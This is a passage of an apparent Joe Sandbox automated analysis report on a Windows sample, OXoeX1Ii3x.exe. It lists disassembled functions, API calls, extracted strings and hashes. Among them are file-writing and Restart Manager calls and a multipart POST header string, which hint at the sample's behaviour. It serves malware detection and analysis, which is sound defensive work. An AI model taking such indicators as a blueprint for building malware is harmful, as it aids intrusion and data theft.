                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                            • Opcode ID: 10c8c402948a6e98991b40ac6e73482989454fb5f67e6f848e055048ccdb7c36
                                                                                                                                                                                            • Instruction ID: 16ee81853fe39c9c411f257a023a8eca2487ee1506957aa6fdbd8b745e3c8fb5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 10c8c402948a6e98991b40ac6e73482989454fb5f67e6f848e055048ccdb7c36
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3051BD7262021AABEF609FA0DD48FEB7BE9EF25754F104035F925E6190D7748DA0CB50
                                                                                                                                                                                            Function 0023451B Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                            • Opcode ID: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                            • Instruction ID: e2ece3b51dd7c363fb48d28b93b867c4f9981616cf4dd9e9fc448609dde1a247
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12cbd57efc24f00b10807126745757f58c8e6f66b67890c3a73c114f1d70c3a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67B14CB2E203569FDB15DF54CC82BAEBBA5EF16310F144195E904AB382D374E921CBA0
                                                                                                                                                                                            Function 00206671 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 199COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0020667B
                                                                                                                                                                                              • Part of subcall function 00206543: __EH_prolog3_GS.LIBCMT ref: 0020654D
                                                                                                                                                                                            • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00206893
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$DebugOutputString
                                                                                                                                                                                            • String ID: --------$($Content-Type: application/octet-stream; boundary=----$POST
                                                                                                                                                                                            • API String ID: 345087456-2938435220
                                                                                                                                                                                            • Opcode ID: cc8b9744e480a47864bc44daa322ffa30b5f64cd1cedadf7e20ea9ffade005eb
                                                                                                                                                                                            • Instruction ID: f33430b412579ea7fc92080e56c4d37bbc9e69321094ace0a723bb4c008dbed5
                                                                                                                                                                                            • Opcode Fuzzy Hash: cc8b9744e480a47864bc44daa322ffa30b5f64cd1cedadf7e20ea9ffade005eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B7182B0A102199FEF209F10CD49BAA77B8EF45714F004199FA09A7292DB709E94CF65
                                                                                                                                                                                            Function 0021B335 Relevance: 10.7, APIs: 7, Instructions: 159synchronizationCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0021C2B7: __EH_prolog3_GS.LIBCMT ref: 0021C2C1
                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            • RmStartSession.RSTRTMGR(?,00000000,?,?,?,00000000), ref: 0021B3F0
                                                                                                                                                                                              • Part of subcall function 0021ABF2: __EH_prolog3_GS.LIBCMT ref: 0021ABF9
                                                                                                                                                                                              • Part of subcall function 0021ABF2: ctype.LIBCPMT ref: 0021ACB5
                                                                                                                                                                                            • RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000), ref: 0021B43F
                                                                                                                                                                                            • RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0021B479
                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0021B493
                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0021B4CF
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0021B4D6
                                                                                                                                                                                            • RmEndSession.RSTRTMGR(?), ref: 0021B4F9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_Session$CloseCurrentH_prolog3_catch_HandleListObjectProcessRegisterResourcesSingleStartWaitctype
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4225474974-0
                                                                                                                                                                                            • Opcode ID: 80f8344a80c9c2d2c5dfc009d93590a7a95aceb71541b67b8a38385e2a078547
                                                                                                                                                                                            • Instruction ID: 3711bd7d9135403a1a5c1ecbefc14faf8d97428c81d256aac178250e89bb91e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 80f8344a80c9c2d2c5dfc009d93590a7a95aceb71541b67b8a38385e2a078547
                                                                                                                                                                                            • Instruction Fuzzy Hash: BC518B71A11218AFDB21DF64CD89ADE7BB8BF16340F4041A9F40AA3582DB349F84CF52
                                                                                                                                                                                            Function 002201A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 002201D7
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 002201DF
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00220268
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00220293
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 002202E8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                            • Opcode ID: 240253b9c5ff27b4f3702c5cf29803c76fd48eb5cfcba5c15d25a90612313fb4
                                                                                                                                                                                            • Instruction ID: a4858fc1848becd75b8c0d269c5379e012454b0e359c7372bfef265cbfaec788
                                                                                                                                                                                            • Opcode Fuzzy Hash: 240253b9c5ff27b4f3702c5cf29803c76fd48eb5cfcba5c15d25a90612313fb4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 86419834920229FBCF10DFA8D8C4A9E7BB5EF45314F148256EC185B352D735AA25CF90
                                                                                                                                                                                            Function 0021A393 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0021A39A
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0021A3A7
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0021A3F8
                                                                                                                                                                                              • Part of subcall function 0021DF22: _Yarn.LIBCPMT ref: 0021DF41
                                                                                                                                                                                              • Part of subcall function 0021DF22: _Yarn.LIBCPMT ref: 0021DF65
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0021A44A
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0021A4D6
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Locinfo::_LockitYarn$H_prolog3Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                            • API String ID: 2469272659-1405518554
                                                                                                                                                                                            • Opcode ID: 17261a740056a2038ff8e84bcc63e5d84dc1f6618c53da4988ec7ed0316810a2
                                                                                                                                                                                            • Instruction ID: 1e3c632b4a88b2175af3244c3e8f8d72bf74da0c3155273a0583154e0c37be1a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 17261a740056a2038ff8e84bcc63e5d84dc1f6618c53da4988ec7ed0316810a2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241C471815B84EECB31DFA9D64578AFBF0EF14310F108A6EE08A93A81C7B49A54CF55
                                                                                                                                                                                            Function 0022FDF8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: \#$C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                            • API String ID: 0-3005865697
                                                                                                                                                                                            • Opcode ID: c271204ece687104f70b18b05de1d418e72e27ef64b4f00910f1af6b79c47411
                                                                                                                                                                                            • Instruction ID: d823e03d233bf372e581a7c5b028970e11f2f4d89507f21ef55bd05325a0819b
                                                                                                                                                                                            • Opcode Fuzzy Hash: c271204ece687104f70b18b05de1d418e72e27ef64b4f00910f1af6b79c47411
                                                                                                                                                                                            • Instruction Fuzzy Hash: B921D772620226BFDB52AFE0FE4596B77B9BF013547124534F91597262E770DC208B90
                                                                                                                                                                                            Function 00231D4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,07CD655B,?,00231E59,?,?,00000000,?), ref: 00231E0B
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                            • Opcode ID: 6f1e3ab9cf67e27758face875b1fa313cfc5caccec2da53cb99068273c0f02ed
                                                                                                                                                                                            • Instruction ID: 37a47b81027d2fdd3cde41a3a5f9e1da3e2f6704d7ef6c4436324d11e36df8aa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f1e3ab9cf67e27758face875b1fa313cfc5caccec2da53cb99068273c0f02ed
                                                                                                                                                                                            • Instruction Fuzzy Hash: 29212BB5A20225A7C7229F64FC49A5E3768EF437A0F110160F815A72D1E770ED30C6E1
                                                                                                                                                                                            Function 00223D92 Relevance: 9.3, APIs: 6, Instructions: 265COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __allrem.LIBCMT ref: 00223F1A
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223F36
                                                                                                                                                                                            • __allrem.LIBCMT ref: 00223F4D
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223F6B
                                                                                                                                                                                            • __allrem.LIBCMT ref: 00223F82
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00223FA0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                            • Opcode ID: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
                                                                                                                                                                                            • Instruction ID: 7225c3946d80a06055b0c4ac0ff21a835e4dc01752a92976e3c530509240b72e
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c21de6e89a5a046325f8e7b47af35d8f050f99e2fc3b5b3c456845d04feeb3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A8138B1A20722BBE724EFA8EC82B5AB3E9AF44320F144129F515D7691E774DB548F40
                                                                                                                                                                                            Function 0021760F Relevance: 9.1, APIs: 6, Instructions: 78fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217644
                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00217679
                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000), ref: 0021768C
                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000), ref: 002176A3
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176AA
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002176B9
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$CloseCreateHandle$PointerWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2606874340-0
                                                                                                                                                                                            • Opcode ID: e43e19a695c682e7119b1946e576daeb14934668038141d01f826d4df314fb68
                                                                                                                                                                                            • Instruction ID: 11ce2704d2f05fae8b568a495bda00d48c6713b2f7594b1c7d682e23627bade4
                                                                                                                                                                                            • Opcode Fuzzy Hash: e43e19a695c682e7119b1946e576daeb14934668038141d01f826d4df314fb68
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35219F71710204AFE7249F6CEC4EFAA77BCFB4A711F040658F116D7290D6B0AC848B60
                                                                                                                                                                                            Function 0021E3C2 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0021E3C9
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0021E3D3
                                                                                                                                                                                              • Part of subcall function 0021A4EA: __EH_prolog3_GS.LIBCMT ref: 0021A4F1
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0021A502
                                                                                                                                                                                              • Part of subcall function 0021A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0021A524
                                                                                                                                                                                            • codecvt.LIBCPMT ref: 0021E40D
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0021E424
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0021E444
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0021E451
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registercodecvt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 878568432-0
                                                                                                                                                                                            • Opcode ID: f313292dfd397670ee9213fc82e90359afc3365849f867cee631818de9461c50
                                                                                                                                                                                            • Instruction ID: 4654047cfdd8c31d7acdc72490fe82d030be596959df98b242bcbd29c40c79c7
                                                                                                                                                                                            • Opcode Fuzzy Hash: f313292dfd397670ee9213fc82e90359afc3365849f867cee631818de9461c50
                                                                                                                                                                                            • Instruction Fuzzy Hash: C51133719202299FCB04EF64D8466EEBBF5EF54310F24041EE802A7381EBB09E51CF82
                                                                                                                                                                                            Function 002223CA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,002223C1,0022051C,0021D594), ref: 002223D8
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002223E6
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002223FF
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,002223C1,0022051C,0021D594), ref: 00222451
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: a877230e553a44cb2a48f54f3523ac0ff5dfa02d4f87671951f0ce622250dc27
                                                                                                                                                                                            • Instruction ID: 9e25073738e6cbd3d2a15a5cd56d362e1c21d879e3a41510b1bed971f4687ca8
                                                                                                                                                                                            • Opcode Fuzzy Hash: a877230e553a44cb2a48f54f3523ac0ff5dfa02d4f87671951f0ce622250dc27
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E01B532139332FE96187BF4BC4D6272768EB127753700229F520551E1EFA74D75D588
                                                                                                                                                                                            Function 00225179 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225216
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0022531D
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00225330
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID: OQ"$OQ"
                                                                                                                                                                                            • API String ID: 885266447-1907008189
                                                                                                                                                                                            • Opcode ID: 87ba73a9127f39d7e3dc710e9ec0d2296fe9cd6937158d3c1ea991b18849cd84
                                                                                                                                                                                            • Instruction ID: d74206a6a9fa9416c43f9573a696ada162735a3336f78440f66bc065dcf3328b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 87ba73a9127f39d7e3dc710e9ec0d2296fe9cd6937158d3c1ea991b18849cd84
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14517C71A10629EFCF14CF98D881AAEBBB2EB49350F14C159E815A7291D370AE21DB60
                                                                                                                                                                                            Function 0020CBA6 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0020CBAD
                                                                                                                                                                                              • Part of subcall function 0020DF81: __EH_prolog3.LIBCMT ref: 0020DF88
                                                                                                                                                                                              • Part of subcall function 0020FC37: __EH_prolog3.LIBCMT ref: 0020FC3E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                                            • String ID: '$; expected $syntax error $unexpected
                                                                                                                                                                                            • API String ID: 431132790-3930586041
